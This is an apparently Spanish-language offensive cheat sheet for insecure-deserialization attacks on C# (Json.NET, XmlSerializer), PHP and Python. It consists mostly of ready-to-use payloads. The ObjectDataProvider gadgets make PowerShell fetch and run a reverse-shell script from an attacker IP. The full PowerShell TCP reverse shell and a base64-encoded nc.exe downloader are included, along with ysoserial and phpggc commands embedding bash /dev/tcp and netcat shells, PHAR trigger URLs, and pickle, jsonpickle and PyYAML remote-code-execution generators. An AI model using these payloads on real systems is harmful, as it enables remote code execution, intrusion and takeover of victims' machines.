Deserialization

C#

Json.NET

Gadget ObjectDataProvider (ejemplo 1)

{
    "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework",
    "ObjectType": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "MethodParameters": {
        "$type": "MS.Internal.Data.ParameterCollection, PresentationFramework",
        "$values": [
            "powershell.exe",
            "IEX(New-Object Net.WebClient).downloadString('http://<attacker-IP-address>:80/reverse-shell.ps1')"
        ]
    },
    "MethodName": "Start"
}

Gadget ObjectDataProvider (ejemplo 2)

{
    "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework",
    "ObjectType": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "MethodParameters": {
        "$type": "MS.Internal.Data.ParameterCollection, PresentationFramework",
        "$values": [
            "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
            "-WindowStyle Hidden -NonInteractive -exec bypass -enc <base64-payload>"
        ]
    },
    "MethodName": "Start"
}

XmlSerializer

Gadget ObjectDataProvider (ejemplo 1)

<?xml version="1.0"?>
<Example xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <ProjectedProperty0>
    <ObjectInstance xsi:type="XamlReader" />
    <MethodName>Parse</MethodName>
    <MethodParameters>
      <anyType xsi:type="xsd:string">&lt;ObjectDataProvider MethodName="Start" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:sc="clr-namespace:System.Collections;assembly=mscorlib" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"&gt;&lt;ObjectDataProvider.ObjectInstance&gt;&lt;sd:Process&gt;&lt;sd:Process.StartInfo&gt;&lt;sd:ProcessStartInfo Arguments="IEX(New-Object Net.WebClient).downloadString('http://<attacker-IP-address>:80/reverse-shell.ps1')" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="powershell.exe"&gt;&lt;/sd:ProcessStartInfo&gt;&lt;/sd:Process.StartInfo&gt;&lt;/sd:Process&gt;&lt;/ObjectDataProvider.ObjectInstance&gt;&lt;/ObjectDataProvider&gt;</anyType>
    </MethodParameters>
  </ProjectedProperty0>
</Example>

Gadget ObjectDataProvider (ejemplo 2)

<?xml version="1.0"?>
<Example xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <ProjectedProperty0>
    <ObjectInstance xsi:type="XamlReader" />
    <MethodName>Parse</MethodName>
    <MethodParameters>
      <anyType xsi:type="xsd:string">&lt;ObjectDataProvider MethodName="Start" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:sc="clr-namespace:System.Collections;assembly=mscorlib" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"&gt;&lt;ObjectDataProvider.ObjectInstance&gt;&lt;sd:Process&gt;&lt;sd:Process.StartInfo&gt;&lt;sd:ProcessStartInfo Arguments="-WindowStyle Hidden -NonInteractive -exec bypass -enc <base64-payload>" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"&gt;&lt;/sd:ProcessStartInfo&gt;&lt;/sd:Process.StartInfo&gt;&lt;/sd:Process&gt;&lt;/ObjectDataProvider.ObjectInstance&gt;&lt;/ObjectDataProvider&gt;</anyType>
    </MethodParameters>
  </ProjectedProperty0>
</Example>

Type

System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089

Reverse shell

Ejemplo 1

# Máquina atacante
## reverse shell (reverse-shell.ps1)
$client = New-Object System.Net.Sockets.TCPClient('<attacker-IP-address>',<listen-port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
## HTTP server
python3 -m http.server 80
## Netcat
nc -lvnp <listen-port>

Ejemplo 2

# Máquina atacante
## Descarga de netcat
wget https://raw.githubusercontent.com/MrW0l05zyn/pentesting/refs/heads/master/windows/shell/netcat/netcat-x64.exe
mv netcat-x64.exe nc.exe
## HTTP server
python3 -m http.server 80
## Generación de payload en base64
python3 -c 'import base64; print(base64.b64encode((r"""(new-object net.webclient).downloadfile("http://<attacker-IP-address>:80/nc.exe", "c:\windows\tasks\nc.exe");c:\windows\tasks\nc.exe -nv <attacker-IP-address> <listen-port> -e c:\windows\system32\cmd.exe;""").encode("utf-16-le")).decode())'
## Netcat
nc -lvnp <listen-port>

Herramientas

YSoSerial.NET

# General
.\ysoserial.exe -f <formatter> -g <gadget> -c <payload> -o <output>
# Json.Net / Gadget ObjectDataProvider
.\ysoserial.exe -f Json.Net -g ObjectDataProvider -c "<payload>" -o Raw
# XmlSerializer / Gadget ObjectDataProvider
.\ysoserial.exe -f XmlSerializer -g ObjectDataProvider -c "<payload>" -o Raw

PHP

Herramientas

PHPGGC

Listar gadget chains disponibles.

phpggc -l
phpggc -l <framework>

Generar un payload utilizando un gadget chains específico.

phpggc <gadget-chain> system "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash" -b
phpggc <gadget-chain> system "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
phpggc <gadget-chain> exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
phpggc <gadget-chain> shell_exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
phpggc <gadget-chain> passthru "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b

Generar un archivo PHAR utilizando un gadget chains específico.

phpggc -p phar <gadget-chain> system "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash" -o file.phar
phpggc -p phar <gadget-chain> system "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
phpggc -p phar <gadget-chain> exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
phpggc -p phar <gadget-chain> shell_exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
phpggc -p phar <gadget-chain> passthru "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
http://example.com/?file=uploads/file.txt
http://example.com/?file=phar://uploads/file.phar

Python

Pickle

import base64, pickle, os

class RCE:
	def __reduce__(self):
		payload = "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash"
		return os.system, (payload,)

print(base64.b64encode(pickle.dumps(RCE())).decode())

JSONPickle

import jsonpickle, os

class RCE:
	def __reduce__(self):
		payload = "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash"
		return os.system, (payload,)

print(jsonpickle.encode(RCE()))

PyYAML

import yaml, subprocess

class RCE:
	def __reduce__(self):
		return subprocess.Popen(["nc", "-nv", "<attacker-IP-address>", "<listen-port>", "-e", "/bin/bash"])

print(yaml.dump(RCE()))

Herramientas

PEAS

Última actualización

¿Te fue útil?